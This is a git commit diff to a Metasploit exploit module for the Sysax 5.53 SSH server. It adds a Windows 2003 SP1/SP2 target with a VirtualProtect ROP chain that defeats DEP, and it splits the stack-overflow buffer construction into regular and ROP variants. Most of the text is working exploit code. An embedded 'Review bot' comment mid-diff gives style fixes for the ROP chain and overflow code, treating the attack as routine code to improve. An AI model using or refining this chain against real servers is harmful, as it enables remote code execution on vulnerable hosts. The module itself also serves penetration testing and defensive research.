Add ROP target for Win2k3 SP1 and SP2
parent
29cf8683ee
commit
4b1e67f94f
@ -47,9 +47,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Win XP SP3 and Win2k3 SP0
|
||||
# POP/POP/RET - sysaxservd.exe
|
||||
['Sysax 5.53 on Win XP SP3 / Win2k3 SP0', {'Ret'=>0x00402669}]
|
||||
[
|
||||
'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
|
||||
{
|
||||
'Rop' => false,
|
||||
'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe
|
||||
}
|
||||
],
|
||||
[
|
||||
'Sysax 5.53 on Win2K3 SP1/SP2',
|
||||
{
|
||||
'Rop' => true,
|
||||
'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Feb 27 2012",
|
||||
|
@ -70,16 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
#
|
||||
# Load net/ssh so we can talk the SSH protocol
|
||||
#
|
||||
has_netssh = load_netssh
|
||||
if not has_netssh
|
||||
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
||||
return
|
||||
end
|
||||
|
||||
def get_regular_exploit
|
||||
#
|
||||
# Align the stack to the beginning of the fixed size payload
|
||||
#
|
||||
|
@ -115,6 +117,80 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
|
||||
buf << [target.ret].pack('V*')
|
||||
|
||||
return buf
|
||||
end
|
||||
|
||||
def get_rop_exploit
|
||||
|
||||
junk = rand_text(4).unpack("L")[0].to_i
|
||||
nop = make_nops(4).unpack("L")[0].to_i
|
||||
|
||||
# !mona rop -m msvcrt
|
||||
p =
|
||||
[
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x77ba1114, # <- *&VirtualProtect()
|
||||
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
|
||||
junk,
|
||||
0x77bb0c86, # XCHG EAX,ESI # RETN
|
||||
0x77bc9801, # POP EBP # RETN
|
||||
0x77be2265, # ptr to 'push esp # ret'
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x03C0990F,
|
||||
0x77bdd441, # SUB EAX, 03c0940f
|
||||
0x77bb48d3, # POP EBX, RET
|
||||
0x77bf21e0, # .data
|
||||
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
|
||||
0x77bbfc02, # POP ECX # RETN
|
||||
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
|
||||
0x77bd8c04, # POP EDI # RETN
|
||||
0x77bd8c05, # ROP NOP (-> edi)
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x03c0984f,
|
||||
0x77bdd441, # SUB EAX, 03c0940f
|
||||
0x77bb8285, # XCHG EAX,EDX # RETN
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
nop,
|
||||
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
|
||||
].pack("V*")
|
||||
|
||||
p << payload.encoded
|
||||
|
||||
#
|
||||
# Similar buffer structure to get_regular_exploit
|
||||
#
|
||||
buf = ''
|
||||
buf << rand_text(392, payload_badchars)
|
||||
buf << rand_text(20, payload_badchars)
|
||||
buf << rand_text(1012, payload_badchars)
|
||||
buf << p
|
||||
buf << rand_text(9204-buf.length)
|
||||
buf << rand_text(4, payload_badchars)
|
||||
buf << [target.ret].pack('V*')
|
||||
|
||||
return buf
|
||||
end
|
||||
|
||||
def exploit
|
||||
#
|
||||
# Load net/ssh so we can talk the SSH protocol
|
||||
#
|
||||
has_netssh = load_netssh
|
||||
if not has_netssh
|
||||
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
||||
return
|
||||
end
|
||||
|
||||
#
|
||||
# Create buffer based on target (DEP or no DEP)
|
||||
# If possible, we still prefer to use the regular version because it's more stable
|
||||
#
|
||||
if target['Rop']
|
||||
buf = get_rop_exploit
|
||||
else
|
||||
buf = get_regular_exploit
|
||||
end
|
||||
|
||||
#
|
||||
# Send the malicious buffer
|
||||
#
|
||||
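Review bot: In get_rop_exploit the chain is bound to a local named `p`, which shadows `Kernel#p` for the rest of the method and reads as a debugging leftover; a descriptive name such as `chain` would make `chain << payload.encoded` self-explanatory. The two scratch values are also built with native-endian `unpack("L")` while every other word in the method is packed with the explicit little-endian `"V*"`, and the trailing `.to_i` is redundant because unpack already yields an Integer — `junk = rand_text(4).unpack("V")[0]` and `nop = make_nops(4).unpack("V")[0]` keep one byte-order convention throughout (equivalent on little-endian hosts, but consistent). In the new `exploit`, `if not has_netssh` is the non-idiomatic form of `unless has_netssh`, and the four-line `if target['Rop'] ... else ... end` assignment collapses to `buf = target['Rop'] ? get_rop_exploit : get_regular_exploit`. Both `get_regular_exploit` (its start) and `exploit` (its send section) continue outside this hunk.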
|
@ -149,6 +225,4 @@ end
|
|||
=begin
|
||||
Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
|
||||
relying on net/ssh.
|
||||
|
||||
* Need a reliable stack pivot to rop out, haven't found one
|
||||
=end
|
||||